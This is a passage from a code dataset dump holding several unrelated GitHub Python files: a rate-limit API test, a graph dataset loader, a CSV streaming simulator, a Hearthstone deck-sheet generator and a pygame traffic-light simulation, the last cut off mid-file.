LocalApplicableTestCase\n\n\nclass TestLog(LocalApplicableTestCase):\n\n @classmethod\n def mockup(cls):\n session = cls.create_session()\n cls.rule1 = Rule(pattern='/foo/bar', limit='2/min', is_exact_url=True)\n session.add(cls.rule1)\n\n cls.rule2 = Rule(pattern='/foo/.*', limit='2/min')\n session.add(cls.rule2)\n session.commit()\n\n def test_post(self):\n redisconn = redisconnection()\n redisconn.flushdb()\n json = dict(url=self.rule1.pattern, IP='1.1.1.1')\n\n with self.given(\n 'Post a log to check if passed the limit or not',\n '/apiv1/logs',\n 'POST',\n json=json,\n ):\n assert status == 200\n assert redisconn.get(keystr(json['IP'], json['url'])) == b'1'\n\n when('The specific IP viewed the url one more time')\n assert status == 200\n assert redisconn.get(keystr(json['IP'], json['url'])) == b'2'\n\n when('The specific IP viewed the url more than valid limitation')\n assert status == 429\n assert redisconn.get(keystr(json['IP'], json['url'])) == b'3'\n\n when(\n 'IP field is not in form',\n json=given - 'IP',\n )\n assert status == 400\n\n when(\n 'URL field is not in form',\n json=given - 'url',\n )\n assert status == 400\n\n","repo_name":"shayan-7/accesshandler","sub_path":"tests/test_log_post.py","file_name":"test_log_post.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"1388335176","text":"from dgl.data import CoraGraphDataset, CoraFullDataset, RedditDataset, CoauthorCSDataset, AmazonCoBuyComputerDataset, CiteseerGraphDataset\nfrom ogb.nodeproppred import DglNodePropPredDataset\nfrom sklearn.preprocessing import MinMaxScaler\nimport scipy.sparse as sp\nimport numpy as np\nimport os\nimport random\nimport torch\nfrom config import *\nfrom torch.nn.functional import one_hot\n\n\ndef download(dataset):\n if dataset == 'Cora':\n return CoraGraphDataset()\n elif dataset == 'CoraFull':\n return CoraFullDataset(raw_dir=\"../dataset\")\n elif dataset == 'Reddit':\n return RedditDataset()\n elif dataset == 'ogbn-arxiv':\n return DglNodePropPredDataset(name='ogbn-arxiv', root=\"../dataset\")\n elif dataset == 'Coauthor-CS':\n return 
CoauthorCSDataset()\n    elif dataset == 'Amazon-Computer':\n        return AmazonCoBuyComputerDataset()\n    elif dataset == 'CiteSeer':\n        return CiteseerGraphDataset()\n    else:\n        print(\"dataset not supported!\")\n        return None\n\n\ndef load(dataset):\n    datadir = os.path.join('data', dataset)\n    # class_split = {\"train\": 0.6, \"test\": 0.4}\n\n    ds = download(dataset)\n    if dataset == 'ogbn-arxiv':\n        ds = ds[0]\n    adj = ds[0].adj().to_dense().numpy().astype(int)\n    adj = sp.csr_matrix(adj)\n    feat = ds[0].ndata['feat'][:]\n    labels = ds[0].ndata['label'][:]\n\n    class_list = [i for i in range(ds.num_classes)]\n    train_num = class_split[dataset][\"train\"]\n    dev_num = class_split[dataset][\"dev\"]\n    test_num = class_split[dataset][\"test\"]\n    random.shuffle(class_list)\n    train_class = class_list[: train_num]\n    dev_class = class_list[train_num : train_num + dev_num]\n    test_class = class_list[train_num + dev_num:]\n    print(\"train_num: {}; dev_num: {}; test_num: {}\".format(train_num, dev_num, test_num))\n    id_by_class = {}\n    for i in class_list:\n        id_by_class[i] = []\n    for id, cla in enumerate(torch.squeeze(labels).tolist()):\n        id_by_class[cla].append(id)\n\n    idx_train = []\n    for cla in train_class:\n        idx_train.extend(id_by_class[cla])\n\n    labels = one_hot(labels).numpy()\n\n    return adj, feat, labels, train_class, dev_class, test_class, id_by_class\n\n\ndef test_task_generator(id_by_class, class_list, n_way, k_shot, m_query):\n\n    # sample class indices\n    class_selected = random.sample(class_list, n_way)\n    id_support = []\n    id_query = []\n\n    for cla in class_selected:\n        temp = random.sample(id_by_class[cla], k_shot + m_query)\n        id_support.extend(temp[:k_shot])\n        id_query.extend(temp[k_shot:])\n\n    return np.array(id_support), np.array(id_query), class_selected\n\n\nif __name__ == '__main__':\n    load('CiteSeer')\n# return\n","repo_name":"Zhen-Tan-dmml/TLP-FSNC","sub_path":"GCL/merit/data_split.py","file_name":"data_split.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"37454894837","text":"\"\"\"This script shows how to simulate a real time data transfer while reading from a csv source file\"\"\"\n\nfrom os.path import join, realpath, dirname\nimport pandas as pd\nfrom sqlalchemy import create_engine\nimport csv\nfrom time import ctime, sleep\n\n#Getting the File Path\nfile_path = dirname(realpath(__file__))\ndir_path = join(file_path, 'assests/acc_records.csv')\n\n#USING THE DICTREADER METHOD\ndef read_by_dict_method():\n\t#reading in the file object\n\tfile_object = open(dir_path, \"r\")\n\tdata = csv.DictReader(file_object)\n\n\t#simulating real time data transfer\n\tfor row in data:\n\t\tprint(row)\n\t\tsleep(1)\n\tfile_object.close()\n\n#USING THE READER METHOD\n#make a connection to the database\n#ensure you create a database first\ndef read_by_reader_method():\n\tengine = create_engine(f\"postgresql://{'root'}:{'root'}@{'localhost'}:{5432}/{'test_db'}\")\n\twith open(dir_path, 'r') as file_object:\n\t\tdata = csv.reader(file_object)\n\t\t#create the header row and skip through it\n\t\theader = next(data)\n\t\t#simulating a real time data transfer\n\t\tfor row in data:\n\t\t\tdf_row = pd.DataFrame([row], columns = header)\n\t\t\tprint(df_row)\n\t\t\tdf_row.to_sql('db_table_name', con=engine, if_exists='append', index=False)\n\t\t\tprint(f'committed to db at: {ctime()}')\n\t\t\tsleep(1)\n\n\nif __name__ == 
'__main__':\n\tread_by_dict_method()\n\n\n\n\n","repo_name":"paulonye/kafka_projects","sub_path":"datagen.py","file_name":"datagen.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74560865524","text":"import MySQLdb\nimport sys\nsys.path.append('../')\nfrom config import basedir\nsys.path.append(basedir)\nsys.path.append(basedir + '/lineupSolver')\n\n\nfrom config import *\nfrom shared_utils import *\nfrom deck_manager import *\nconnection = MySQLdb.connect(host='localhost', user=db_user, passwd=db_passwd)\ncursor = connection.cursor()\n\ndef make_archetype_sheet(archetype):\n archetype_print = archetype.replace(' ', '')\n region = 'NA'\n output_file = open('NA_sheets/%(archetype_print)s.csv' % locals(), 'w')\n decks = []\n deckstrings = []\n cursor.execute('SELECT deck_name, deck_id, deck_code FROM deckstrings.decks WHERE deck_archetype = \"%(archetype)s\" and playoff_region = \"%(region)s\" and date > \"2019_01_01\"' % locals())\n for deck_name, deck_id, deck_code in cursor.fetchall():\n deck_code = deck_code.strip()\n deckstrings.append(deck_code)\n decks.append(EasyDeck(deck_code, deck_name))\n\n compare = decks[0]\n for i in range(0, len(decks)):\n decks = decks[:i+1] + sorted(decks[i+1:], key=lambda x:x.get_distance(decks[i]))\n output_file.write(side_by_side_diff_csv(decks))\n output_file.close()\n #print(len(set(deckstrings)), len(deckstrings))\n\ndef make_lineups_sheet():\n output_file = open('NA_sheets/Lineups.csv', 'w')\n region = 'NA'\n cursor.execute(\"SELECT deck_name, deck_archetype FROM deckstrings.decks WHERE playoff_region = '%(region)s' and date > '2019_01_01'\" % locals())\n player_decks = {}\n output_file.write(\"Player,Deck1,Deck2,Deck3,Deck4\\n\")\n for deck_name, deck_archetype in cursor.fetchall():\n if deck_name not in player_decks:\n player_decks[deck_name] = []\n player_decks[deck_name].append('\"' + deck_archetype + '\"')\n\n for i in player_decks:\n player_decks[i].sort(key=lambda x:x.split(' ')[-1])\n\n lineups = {}\n for i, j in sorted(player_decks.items(), key=lambda x:x[0].lower()):\n lineups[tuple(j)] = lineups.get(tuple(j), []) + [i]\n output_file.write('\"' + i + '\",')\n output_file.write(\",\".join(j))\n output_file.write(\"\\n\")\n output_file.write('\\n\\n')\n num_players = len(player_decks.keys())\n output_file.write(\"Deck1,Deck2,Deck3,Deck4,Percent of Field,,Players\\n\")\n for lu, players in sorted(lineups.items(), key=lambda x:len(x[1]), reverse=True):\n output_file.write(\",\".join(list(lu)) + \",\" + str(round(len(players) / float(num_players) * 100, 1)) + \",,\" + \",\".join(players) + '\\n')\n\ndef archetype_percents():\n output_file = open('NA_sheets/Archetypes.csv', 'w')\n output_file.write(\"Archetype,Number,Percentage of Decks\\n\")\n region = 'NA'\n total = 0\n cursor.execute(\"select deck_archetype, deck_class, count(deck_archetype) as total FROM deckstrings.decks WHERE playoff_region = '%(region)s' and date > '2019_01_01' group by deck_archetype, deck_class order by deck_class, total desc\" % locals())\n archetypes = []\n for i,j,k in cursor.fetchall():\n i = '\"' + i + '\"'\n k = int(k)\n archetypes.append((i,k))\n total += k\n for i,j in archetypes:\n output_file.write(\",\".join([i, str(j), str(round(j/float(total) * 100, 1))]) + '\\n')\n\narchetype_percents()\n \n\nmake_lineups_sheet()\n\nregion = 'NA'\ncursor.execute(\"SELECT distinct deck_archetype FROM deckstrings.decks WHERE playoff_region = '%(region)s' and date > 
'2019_01_01'\" % locals())\nfor (archetype,) in cursor.fetchall():\n make_archetype_sheet(archetype)\n\n\n","repo_name":"jegutman/hearthstone_decks","sub_path":"PlayoffLoader/make_tournament_sheets.py","file_name":"make_tournament_sheets.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"28156630085","text":"from ast import If\nfrom pickle import NONE\nfrom random import randint\nimport sys\nfrom time import time\nfrom tkinter import CENTER, font\nfrom tracemalloc import start\nfrom turtle import color\nimport pygame\nfrom sys import exit\nimport time\nimport math\n\n\ndef update_score(score, high_score):\n if score > high_score:\n high_score = score\n return high_score\n\n\ndef car_movement(car_list):\n if car_list:\n for car_rect in car_list:\n if car_rect.x > 500:\n screen.blit(car, car_rect)\n car_list = [car for car in car_list if car.x > 1100]\n\n return car_list\n else:\n return []\n\n\ndef display_score():\n\n current_time = int(pygame.time.get_ticks() / 1000) - start_time\n infoAttempt = game_font.render(\n f'Attempts: {nrOfAttempts}', False, (65, 65, 65))\n infoAttempt_rect = infoAttempt.get_rect(center=(180, 380))\n info_surfQ = game_font.render(\n f\"s- Stop\", False, (70, 70, 70))\n info_rectQ = info_surfQ.get_rect(center=(720, 120))\n score_surf = game_font.render(\n f'Score: {current_time} s', False, (60, 60, 60))\n score_rect = score_surf.get_rect(center=(180, 120))\n screen.blit(score_surf, score_rect)\n screen.blit(info_surfQ, info_rectQ)\n screen.blit(infoAttempt, infoAttempt_rect)\n if current_time == 0:\n current_time = 1\n return current_time\n else:\n return current_time\n\n\ndef blitRotateCenter(surf, image, topleft, angle):\n\n rotated_image = pygame.transform.rotate(image, angle)\n new_rect = rotated_image.get_rect(\n center=image.get_rect(topleft=topleft).center)\n\n surf.blit(rotated_image, new_rect)\n\n\n# start\npygame.init()\nscreen = pygame.display.set_mode((1000, 500))\npygame.display.set_caption(\"Traffic Light System\")\n\nPATH = [(175, 119), (110, 70), (56, 133), (70, 481), (318, 731), (404, 680), (418, 521), (507, 475), (600, 551), (613, 715), (736, 713),\n (734, 399), (611, 357), (409, 343), (433, 257), (697, 258), (738, 123), (581, 71), (303, 78), (275, 377), (176, 388), (178, 260)]\n\nclock = pygame.time.Clock()\ngame_active = False\nstart_time = 0\nscore = 0\ngame_font = pygame.font.Font('font/Pixeltype.ttf', 50)\ngame_font1 = pygame.font.Font('font/Pixeltype.ttf', 30)\nhigh_score = 0\nnrOfAttempts = 0\n\n# intro\ngame_name = game_font.render('Traffic control simulation', False, (65, 65, 65))\ngame_name_rect = game_name.get_rect(center=(480, 200))\ngame_message = game_font.render('Press SPACE to start', False, (255, 255, 255))\ngame_message_rect = game_message.get_rect(center=(480, 280))\n\n\n# roads\nroadFromLeft = pygame.Surface([1000, 100])\nroadFromLeft.fill((128, 128, 118))\nroadFromLeft_rect = roadFromLeft.get_rect(topleft=(0, 200))\n\nroadFromTop = pygame.Surface([100, 500])\nroadFromTop.fill((128, 128, 118))\nroadFromTop_rect = roadFromTop.get_rect(topleft=(450, 0))\n\nroadOutlineHorizontal = pygame.Surface([450, 10])\nroadOutlineHorizontal.fill((160, 154, 154))\nroadOutlineHorizontal_rect = roadOutlineHorizontal.get_rect(topleft=(0, 190))\n\nroadOutlineVertical = pygame.Surface([10, 200])\nroadOutlineVertical.fill((160, 154, 154))\nroadOutlineVertical_rect = roadOutlineVertical.get_rect(topleft=(440, 0))\n\n# cars from left\ncar = 
pygame.image.load('graphics/car.png').convert_alpha()\ncar = pygame.transform.scale(car, (15, 12))\ncar_rect = car.get_rect(topleft=(10, 275))\nsides = ['top', 'bottom', 'left', 'right']\n\ncar1 = pygame.image.load('graphics/car.png').convert_alpha()\ncar1 = pygame.transform.scale(car1, (15, 12))\ncar_rect1 = car1.get_rect(topleft=(10, 255))\n\n\n# cars from right\ncar2 = pygame.image.load('graphics/carLeft.png').convert_alpha()\ncar2 = pygame.transform.scale(car2, (15, 12))\ncar_rect2 = car2.get_rect(topleft=(980, 205))\n\n\ncar3 = pygame.image.load('graphics/carLeft.png').convert_alpha()\ncar3 = pygame.transform.scale(car3, (15, 12))\ncar_rect3 = car3.get_rect(topleft=(980, 230))\n\n# cars from top 4 && 5\ncar4 = pygame.image.load('graphics/carT.png').convert_alpha()\ncar4 = pygame.transform.scale(car4, (15, 12))\ncar_rect4 = car4.get_rect(topleft=(450, 10))\n\n\ncar5 = pygame.image.load('graphics/carD.png').convert_alpha()\ncar5 = pygame.transform.scale(car5, (15, 12))\ncar_rect5 = car5.get_rect(topleft=(530, 480))\n\n\ncars = [car, car1, car2, car3, car4, car5]\n# traffic light\nyellow = (249, 215, 30)\nred = (255, 0, 0)\ngreen = (0, 255, 0)\n\nlight_on = 0\n\n\nlight = pygame.Surface([10, 10])\nlight.fill((0, 0, 0))\nlight_rect = light.get_rect(topleft=(440, 269))\n\nred_light = pygame.Surface([7, 7])\nred_light.fill(red)\nred_light_rect = light.get_rect(topleft=(440, 269))\n\n\ngreen_light = pygame.Surface([7, 7])\ngreen_light.fill(green)\ngreen_light_rect = light.get_rect(topleft=(440, 269))\n\n\nyellow_light = pygame.Surface([7, 7])\nyellow_light.fill(yellow)\nyellow_light_rect = light.get_rect(topleft=(440, 269))\n\n# traffic light left\nlight_onL = 0\n\n\nlightL = pygame.Surface([10, 10])\nlightL.fill((0, 0, 0))\nlight_rect_L = lightL.get_rect(topleft=(560, 220))\n\nred_lightL = pygame.Surface([7, 7])\nred_lightL.fill(red)\nred_light_rect_L = lightL.get_rect(topleft=(560, 220))\n\n\ngreen_lightL = pygame.Surface([7, 7])\ngreen_lightL.fill(green)\ngreen_light_rect_L = lightL.get_rect(topleft=(560, 220))\n\n\nyellow_lightL = pygame.Surface([7, 7])\nyellow_lightL.fill(yellow)\nyellow_light_rect_L = lightL.get_rect(topleft=(560, 220))\n\n\n# traffic light top\nlight_onT = 0\n\n\nlightT = pygame.Surface([10, 10])\nlightT.fill((0, 0, 0))\nlight_rect_T = lightT.get_rect(topleft=(470, 200))\n\nred_lightT = pygame.Surface([7, 7])\nred_lightT.fill(red)\nred_light_rect_T = lightT.get_rect(topleft=(470, 200))\n\n\ngreen_lightT = pygame.Surface([7, 7])\ngreen_lightT.fill(green)\ngreen_light_rect_T = lightT.get_rect(topleft=(470, 200))\n\n\nyellow_lightT = pygame.Surface([7, 7])\nyellow_lightT.fill(yellow)\nyellow_light_rect_T = lightT.get_rect(topleft=(470, 200))\n\n# traffic light down\nlight_onD = 0\n\n\nlightD = pygame.Surface([10, 10])\nlightD.fill((0, 0, 0))\nlight_rect_D = lightD.get_rect(topleft=(521, 297))\n\nred_lightD = pygame.Surface([7, 7])\nred_lightD.fill(red)\nred_light_rect_D = lightD.get_rect(topleft=(521, 297))\n\n\ngreen_lightD = pygame.Surface([7, 7])\ngreen_lightD.fill(green)\ngreen_light_rect_D = lightD.get_rect(topleft=(521, 297))\n\n\nyellow_lightD = pygame.Surface([7, 7])\nyellow_lightD.fill(yellow)\nyellow_light_rect_D = lightD.get_rect(topleft=(521, 297))\n\n# timers\n# traffic\ntraffic_timer = pygame.USEREVENT + 0\npygame.time.set_timer(traffic_timer, 1500)\n\ncar_timer = pygame.USEREVENT + 1\npygame.time.set_timer(car_timer, 2000)\n\n# start of the loop\nwhile True:\n\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n\n 
if game_active:\n if event.type == car_timer:\n screen.blit(car, car_rect)\n cars.append(car.get_rect(topleft=(10, 275)))\n\n if event.type == traffic_timer:\n\n light_onD += 1\n light_onT += 1\n light_onL += 1\n light_on += 1\n\n # down light\n if light_onD == 3:\n light_onD = 0\n\n if light_onD == 0:\n light_onD = 0\n light_onT = 0\n light_onL = 1\n light_on = 1\n\n if light_onD == 1:\n if light_on == 2 and light_onL == 2:\n light_onD = 0\n elif light_on == 0 and light_onL == 0:\n light_onD = 0\n else:\n light_onD = 1\n\n if light_onD == 2:\n if light_on == 1 or light_onL == 1:\n light_onL = 0\n light_on = 0\n light_onT = 2\n elif light_on == 0 and light_rect_L == 0:\n light_onD = 2\n else:\n light_onD = 0\n\n # from top\n if light_onT == 3:\n light_onT = 0\n\n if light_onT == 0:\n light_onD = 0\n light_onT = 0\n light_onL = 1\n light_on = 1\n\n if light_onT == 1:\n if light_on == 2 and light_onL == 2:\n light_onT = 0\n elif light_on == 0 and light_onL == 0:\n light_onT = 0\n else:\n light_onT = 1\n\n if light_onT == 2:\n if light_on == 1 or light_onL == 1:\n light_on = 0\n light_onL = 0\n light_onT = 2\n elif light_on == 0 and light_onL == 0:\n light_onT = 2\n else:\n light_onT = 0\n light_on = 2\n light_onL = 2\n\n if light_onL == 3: # RED\n light_onL = 0 # RED\n\n if light_onL == 0:\n light_onL = 0\n light_on = 0\n\n if light_onL == 2:\n if light_onD == 2 or light_onT == 2:\n light_onL = 2\n light_onD = 0\n light_onT = 0\n elif light_onD == 0 and light_onT == 0:\n light_onL = 2\n else:\n light_onL = 0\n\n if light_onL == 1:\n if light_onD == 2 and light_onT == 2:\n light_onL = 0\n elif light_onD == 0 and light_onT == 0:\n light_onL = 1\n else:\n light_onL = 1\n\n if light_on == 3:\n light_on = 0\n\n if light_on == 0:\n light_onL = 0\n light_on = 0\n\n if light_on == 2:\n if light_onT == 1 or light_onD == 1:\n light_on = 2\n light_onD = 0\n light_onT = 0\n elif light_onT == 0 and light_onD == 0:\n light_on = 2\n else:\n light_on = 0\n\n if light_on == 1:\n if light_onD == 2 and light_onT == 2:\n light_on = 0\n elif light_onD == 0 and light_onT == 0:\n light_on = 1\n else:\n light_on = 1\n\n else:\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\n game_active = True\n if (start_time > 0):\n break\n else:\n nrOfAttempts += 1\n start_time = int(pygame.time.get_ticks() / 1000)\n\n if event.type == pygame.KEYDOWN and event.key == pygame.K_s:\n game_active = False\n\n if game_active:\n\n # drawing map\n screen.fill((86, 125, 70))\n screen.blit(roadFromLeft, roadFromLeft_rect)\n screen.blit(roadFromTop, roadFromTop_rect)\n screen.blit(roadOutlineHorizontal, roadOutlineHorizontal_rect)\n screen.blit(roadOutlineHorizontal, ((0, 290)))\n screen.blit(roadOutlineHorizontal, ((550, 190)))\n screen.blit(roadOutlineHorizontal, ((550, 290)))\n screen.blit(roadOutlineVertical, roadOutlineVertical_rect)\n screen.blit(roadOutlineVertical, (550, 0))\n screen.blit(roadOutlineVertical, (440, 300))\n screen.blit(roadOutlineVertical, (550, 300))\n screen.blit(car5, car_rect5)\n screen.blit(car4, car_rect4)\n screen.blit(car3, car_rect3)\n screen.blit(car2, car_rect2)\n screen.blit(car1, car_rect1)\n screen.blit(car, car_rect)\n score = display_score()\n high_score = update_score(score, high_score)\n\n # traffic light\n if light_on == 0: # RED LIGHT\n light = screen.blit(red_light, red_light_rect)\n if car_rect.x < 420 or car_rect.x > 490:\n car_rect.x += 5\n if car_rect1.x < 420 or car_rect1.x > 490:\n car_rect1.x += 5\n elif light_on == 1: # YELLOW LIGHT\n light = screen.blit(yellow_light, 
yellow_light_rect)\n if car_rect.x > 380 and car_rect.x < 490:\n car_rect.x += 3\n else:\n car_rect.x += 5\n if car_rect1.x > 380 and car_rect1.x < 490:\n car_rect1.x += 3\n else:\n car_rect1.x += 5\n elif light_on == 2: # GREEN LIGHT\n light = screen.blit(green_light, green_light_rect)\n car_rect.x += 5\n car_rect1.x += 5\n\n if car_rect.x and car_rect1.x > 1100:\n car_rect.left = 10\n car_rect1.left = 10\n\n # traffic light from left\n if light_onL == 0: # RED LIGHT\n lightL = screen.blit(red_lightL, red_light_rect_L)\n if car_rect2.x > 560 or car_rect2.x < 450:\n car_rect2.x -= 5\n if car_rect3.x > 560 or car_rect3.x < 450:\n car_rect3.x -= 5\n elif light_onL == 1: # YELLOW LIGHT\n lightL = screen.blit(yellow_lightL, yellow_light_rect_L)\n if car_rect2.x > 530 and car_rect2.x < 600:\n car_rect2.x -= 3\n else:\n car_rect2.x -= 5\n if car_rect3.x > 530 and car_rect3.x < 600:\n car_rect3.x -= 3\n else:\n car_rect3.x -= 5\n elif light_onL == 2: # GREEN LIGHT\n lightL = screen.blit(green_lightL, green_light_rect_L)\n car_rect2.x -= 5\n car_rect3.x -= 5\n\n if car_rect2.x and car_rect3.x < -100:\n car_rect2.left = 980\n car_rect3.left = 980\n\n # traffic light from top\n if light_onT == 0: # RED LIGHT\n lightT = screen.blit(red_lightT, red_light_rect_T)\n if car_rect4.y > 220 or car_rect4.y < 180:\n car_rect4.y += 5\n elif light_onT == 1: # YELLOW LIGHT\n lightT = screen.blit(yellow_lightT, yellow_light_rect_T)\n if car_rect4.y > 250 and car_rect4.y < 300:\n car_rect4.y += 3\n else:\n car_rect4.y += 5\n elif light_onT == 2: # GREEN LIGHT\n lightT = screen.blit(green_lightT, green_light_rect_T)\n car_rect4.y += 5\n\n if car_rect4.y > 600:\n car_rect4.bottom = 15\n\n # traffic light from down\n if light_onD == 0: # RED LIGHT\n lightD = screen.blit(red_lightD, red_light_rect_D)\n if car_rect5.y > 300 or car_rect5.y < 250: # 0 - 500\n car_rect5.y -= 5\n elif light_onD == 1: # YELLOW LIGHT\n lightD = screen.blit(yellow_lightD, yellow_light_rect_D)\n if car_rect5.y > 250 and car_rect5.y < 300:\n car_rect5.y -= 3\n else:\n car_rect5.y -= 5\n elif light_onD == 2: # GREEN LIGHT\n lightD = screen.blit(green_lightD, green_light_rect_D)\n car_rect5.y -= 5\n\n if car_rect5.y < -100:\n car_rect5.bottom = 490\n\n # drawing roads\n pygame.draw.line(roadFromLeft, 'gold', (0, 45), (440, 45), 4)\n pygame.draw.line(roadFromLeft, 'gold', (560, 45), (1000, 45), 4)\n pygame.draw.line(roadFromTop, 'gold', (50, 0), (50, 190), 4)\n pygame.draw.line(roadFromTop, 'gold', (50, 300), (50, 500), 4)\n # -- top left --\n pygame.draw.line(roadFromLeft, 'gold', (1, 22), (10, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (20, 22), (30, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (40, 22), (50, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (60, 22), (70, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (80, 22), (90, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (100, 22), (110, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (120, 22), (130, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (140, 22), (150, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (160, 22), (170, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (180, 22), (190, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (200, 22), (210, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (220, 22), (230, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (240, 22), (250, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (260, 22), (270, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (280, 22), (290, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (300, 
22), (310, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (320, 22), (330, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (340, 22), (350, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (360, 22), (370, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (380, 22), (390, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (400, 22), (410, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (420, 22), (430, 22), 1)\n # -- bottom left --\n pygame.draw.line(roadFromLeft, 'gold', (1, 72), (10, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (20, 72), (30, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (40, 72), (50, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (60, 72), (70, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (80, 72), (90, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (100, 72), (110, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (120, 72), (130, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (140, 72), (150, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (160, 72), (170, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (180, 72), (190, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (200, 72), (210, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (220, 72), (230, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (240, 72), (250, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (260, 72), (270, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (280, 72), (290, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (300, 72), (310, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (320, 72), (330, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (340, 72), (350, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (360, 72), (430, 72), 3)\n\n # -- right top --\n pygame.draw.line(roadFromLeft, 'gold', (1000, 22), (990, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (980, 22), (970, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (960, 22), (950, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (940, 22), (930, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (920, 22), (910, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (900, 22), (890, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (880, 22), (870, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (860, 22), (850, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (840, 22), (830, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (820, 22), (810, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (800, 22), (790, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (780, 22), (770, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (760, 22), (750, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (740, 22), (730, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (720, 22), (710, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (700, 22), (690, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (680, 22), (670, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (660, 22), (650, 22), 1)\n pygame.draw.line(roadFromLeft, 'gold', (640, 22), (570, 22), 3)\n\n # -- right left --\n pygame.draw.line(roadFromLeft, 'gold', (1000, 72), (990, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (980, 72), (970, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (960, 72), (950, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (940, 72), (930, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (920, 72), (910, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (900, 72), (890, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (880, 72), (870, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (860, 72), (850, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', 
(840, 72), (830, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (820, 72), (810, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (800, 72), (790, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (780, 72), (770, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (760, 72), (750, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (740, 72), (730, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (720, 72), (710, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (700, 72), (690, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (680, 72), (670, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (660, 72), (650, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (640, 72), (630, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (620, 72), (610, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (600, 72), (590, 72), 1)\n pygame.draw.line(roadFromLeft, 'gold', (580, 72), (570, 72), 1)\n\n # -- upper road--\n pygame.draw.line(roadFromTop, 'gold', (50, 0), (50, 190), 4)\n\n pygame.draw.line(roadFromTop, 'gold', (23, 0), (23, 10), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 20), (23, 30), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 40), (23, 50), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 60), (23, 70), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 80), (23, 90), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 